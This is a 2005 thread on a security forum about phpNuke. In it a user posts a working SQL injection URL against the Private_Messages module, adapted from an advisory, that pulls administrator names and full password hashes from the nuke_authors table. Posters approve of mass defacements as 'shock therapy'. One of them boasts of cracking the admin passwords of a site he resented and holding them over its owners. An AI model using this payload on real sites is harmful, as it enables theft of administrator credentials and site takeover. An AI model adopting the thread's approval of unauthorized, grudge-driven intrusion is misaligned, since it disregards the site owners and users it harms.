 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Just quickly. |
 |
 Posted: Mon Apr 04, 2005 12:47 pm |
 |
|
| shai-tan |
| Valuable expert |
 |
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
 |
|
 |
|
I need a quick working exploit like the one in waraxe's advisories for the phpbb part of phpNuke  |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Mon Apr 04, 2005 3:52 pm |
|
|
| murdock |
| Advanced user |
 |
|
| Joined: Mar 16, 2005 |
| Posts: 54 |
|
|
|
|
|
|
|
| I have made some lame script explotis for phpbb, what do you want exactly? |
|
|
|
|
| Posted: Tue Apr 05, 2005 10:45 am |
|
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
there are tons of exploit are in internet, just type a keyword
btw , what version u need to epxploit |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
| Posted: Tue Apr 05, 2005 11:43 am |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
I basically just made my first exploit thanks to waraxe.
I used his proof of concept:
| Quote: | http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=
savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20
SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE
%20radminsuper=1%20LIMIT%201/*
|
And sorted out the nulls.
His one only returns 27 characters of the MD5 and my one well I returns the full MD5. I know that he already knows this but hey I figured it out myself:
| Code: | | http://localhost/nuke9/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,aid,null,null,null,null,null,null,null,null,null,pwd FROM nuke_authors WHERE radminsuper=1 LIMIT 1/* |
Im happy |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
| Posted: Tue Apr 05, 2005 11:59 am |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| shai-tan wrote: | I basically just made my first exploit thanks to waraxe.
I used his proof of concept:
| Quote: | http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=
savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20
SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE
%20radminsuper=1%20LIMIT%201/*
|
And sorted out the nulls.
His one only returns 27 characters of the MD5 and my one well I returns the full MD5. I know that he already knows this but hey I figured it out myself:
| Code: | | http://localhost/nuke9/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,aid,null,null,null,null,null,null,null,null,null,pwd FROM nuke_authors WHERE radminsuper=1 LIMIT 1/* |
Im happy |
Because of this little error im my advisory ( I was rushing too much)many websites were saved from defacement - it needs some work from sploit user  |
|
|
|
|
|
|
|
|
| Posted: Tue Apr 05, 2005 12:09 pm |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
Yes it stopped me once and Ill never have that opportunity again   |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Tue Apr 05, 2005 12:15 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
But think, how many people have learnt from this faulty proof of concept code  |
|
|
|
|
| Posted: Tue Apr 05, 2005 12:34 pm |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
Yes I'm sure many learned. Dont do it again.
Na Kidding. |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Tue Apr 05, 2005 12:37 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
By the way, i have reveiced some emails about "stop the sploit spread". But my personal opinion is, that only this "shock terapy" will make lazy webmasters and programmers to move their a$$es and learn, how to write secure code  |
|
|
|
|
| Posted: Tue Apr 05, 2005 12:54 pm |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
Exactly my way of thinking.
Plus young people (like me, 17) are the future of IT so this teaches us to right secure code in the future. |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Tue Apr 05, 2005 1:23 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Yeah, i agree
By the way, i remember, when i was in beginning and have no idea about IT security and insecurity stuff. It was time, when IIS Unicode bug was new thing. And then i saw on www.xakep.ru (russian hacking site) link to vulnerable IIS server. Whoah - first time i got directly to remote server's hard disc
This was point of turn on my activity, because i wanted to know much much more and maybe even to write some my own sploits  |
|
|
|
|
|
|
|
|
| Posted: Tue Apr 05, 2005 1:52 pm |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
Oh thats just what I needed (sarcasim) now i got to learn Russian  .
My first sploit was this stupid book site. I had a grudge against it. Ive got all the admin's passwords (cracked) they are at my mercy (little do they know it). One thing out of line and there goes 2 years worth or Role Playing.  |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
| Posted: Wed Apr 06, 2005 5:38 am |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| waraxe wrote: | | By the way, i have reveiced some emails about "stop the sploit spread". But my personal opinion is, that only this "shock terapy" will make lazy webmasters and programmers to move their a$$es and learn, how to write secure code |
i have a message too, after i publishing some hole at becommunity, many korean sites being takeover (deface and else) , ups dont be wrong i have send the vendor some message but no respons.
i think about this alot of time, n i agree with u WARAXE ,
so bugtraq isnt so bad , isnt it ? |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
| Posted: Wed Apr 06, 2005 5:50 am |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| waraxe wrote: | Yeah, i agree
By the way, i remember, when i was in beginning and have no idea about IT security and insecurity stuff. It was time, when IIS Unicode bug was new thing. And then i saw on www.xakep.ru (russian hacking site) link to vulnerable IIS server. Whoah - first time i got directly to remote server's hard disc
This was point of turn on my activity, because i wanted to know much much more and maybe even to write some my own sploits |
ouch,
n now i think many new comer inspired by you , waraxe |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 155
Members: 0
Total: 155
